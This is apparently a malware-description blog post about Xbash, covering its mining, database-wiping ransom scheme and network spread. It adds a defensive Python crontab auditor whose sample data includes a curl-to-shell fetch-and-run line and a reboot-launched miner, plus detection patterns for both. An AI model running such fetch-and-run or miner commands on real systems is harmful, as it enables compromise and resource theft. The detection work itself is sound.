Xbash

By GoldSparrow in Malware

Xbash is a particularly harmful malware that has the potential to be one of the threats to make the headlines in 2018. Xbash is written in Python and ties together several features that let it cause trouble in a number of different ways. For example, this cunning threat can hijack your PC and make it part of a botnet; it can use your computer to mine cryptocurrency, which greatly reduces the lifespan of the machine (mining keeps the system overheated for long periods); and, perhaps worst of all, Xbash can gain access to all your databases and permanently delete the information stored there. What makes Xbash even more threatening is that it can infect other systems and servers that are linked to the same network as an infected PC. This worm feature is what raises the seriousness of the threat.

Xbash operates via a Command & Control server, which feeds the malware with a continuous stream of IP addresses that need to be probed for vulnerabilities.

To determine which software and services are running on the targeted server, Xbash scans a large number of ports. The authors have programmed the malware to look for specific services used for database management, file transfer, remote desktop access, etc. If any of these services are active, Xbash attempts to identify their versions and checks whether they are using default login credentials. Xbash looks for outdated versions in particular, since they are more likely to carry unpatched vulnerabilities that would let the remote attackers continue their shady operation. All collected data is then transferred to the remote Command & Control server.

The current variants of the Xbash Ransomware target three database management products: MySQL, PostgreSQL and MongoDB. However, the attack will only be completed if the compromised server is running Linux; Windows servers seem to be safe for now. Sadly, Xbash makes no attempt to preserve the database by either encrypting it or exporting it to the attackers' server. Instead, it wipes the database out entirely and replaces it with a new database titled 'PLEASE_READ_ME_XYZ.' The newly created database contains a single table called 'WARNING,' and inside it is the ransom message:

'Send 0.02 BTC to this address and contact this email with your website or your IP or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not received your payment,we will leak your database

1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1

backupsql@pm.me'

The creators of Xbash have already accumulated approximately $6400 from 48 victims across the three Bitcoin wallets they use. None of the people who fell into this trap and paid will be able to recover their data, since no copy of it was ever kept. This is why it is never safe to pay when being extorted by cybercriminals: there is absolutely no guarantee that you will receive what you are promised, and even if by some chance you do, your hard-earned money will fund the cybercrooks' next project.

As already mentioned, one of Xbash's features is cryptocurrency mining. The threat scans your system, and if a coin miner is already running, Xbash disables it and wipes it off the system, replacing it with its own mining software. Once this is done, Xbash ensures that its coin miner keeps running even if the server is restarted.
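The article says only that the miner is made to survive a restart and does not name the mechanism. As an added example (not code from the article or from Xbash itself), the script below assumes cron as one common Linux persistence location and audits crontab entries for traits a dropped miner tends to have: commands that download and pipe into a shell, binaries run from a world-writable temp directory, known miner strings, and a schedule of `@reboot`. The crontab text, host address and paths are constructed for the example.

```python
"""Audit crontab entries for miner-style persistence.

Added example, not from the article or from Xbash's own code. Cron is an
assumed persistence location (the article does not say which one Xbash
uses); the crontab text, host and paths below are constructed.
"""
import re

# Command traits worth a second look; each alone is a lead, not a verdict.
COMMAND_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "downloads and pipes into a shell"),
    (re.compile(r"(^|\s)/(dev/shm|tmp|var/tmp)/"), "runs from a world-writable temp directory"),
    (re.compile(r"\b(xmrig|minerd|cryptonight|stratum\+tcp)\b"), "contains a known miner string"),
]

# Constructed sample crontab (addresses are from the documentation range).
SAMPLE_CRONTAB = """\
# constructed sample crontab
MAILTO=root
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh
@reboot /tmp/.cache/kworker -o stratum+tcp://198.51.100.7:3333
"""


def parse_crontab(text):
    """Yield (lineno, schedule, command); skip comments, blanks and VAR=value lines."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            # @reboot / @daily style schedules are a single token
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry, nothing to audit
            schedule, command = " ".join(fields[:5]), fields[5]
        yield lineno, schedule, command.strip()


def audit_crontab(text):
    """Return a list of findings for entries whose command matches any pattern.

    A bare @reboot schedule is only reported together with a command hit,
    since plenty of legitimate jobs run at boot.
    """
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        reasons = [why for pat, why in COMMAND_PATTERNS if pat.search(command)]
        if not reasons:
            continue
        if schedule == "@reboot":
            reasons.append("scheduled at every boot")
        findings.append({"line": lineno, "schedule": schedule,
                         "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['command']}")
        for why in f["reasons"]:
            print(f"    - {why}")
```

On a real host the same `audit_crontab` can be fed the output of `crontab -l` for each user and the files under `/etc/cron.d`; the temp-directory and miner-string patterns are the ones that most often single out a dropped miner, while the boot schedule only explains how it survives a restart.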

After analyzing Xbash's code, researchers identified a Python class named 'LanScan.' When an infected computer is connected to a network, the 'LanScan' feature scans the local intranet and compiles a list of all the IP addresses linked to it. This is why Xbash is said to behave like a worm. If this succeeds, the creators of Xbash gain a view of every system connected to the infiltrated network and begin scanning them for vulnerabilities. If Xbash detects an exploitable service, it infects that system and the whole process starts all over again.

It is not easy to protect yourself from highly malignant threats like Xbash. One thing every user must do is keep all their software up to date. This may sound like a dull task, but it may save you a lot of trouble. Nowadays, there is third-party software that helps you keep track of updates for everything installed on your system, making it much less likely that you will have to deal with pests like Xbash. Another important step is to install a trustworthy anti-spyware suite that keeps an eye out for any unsafe software attempting to take advantage of you.
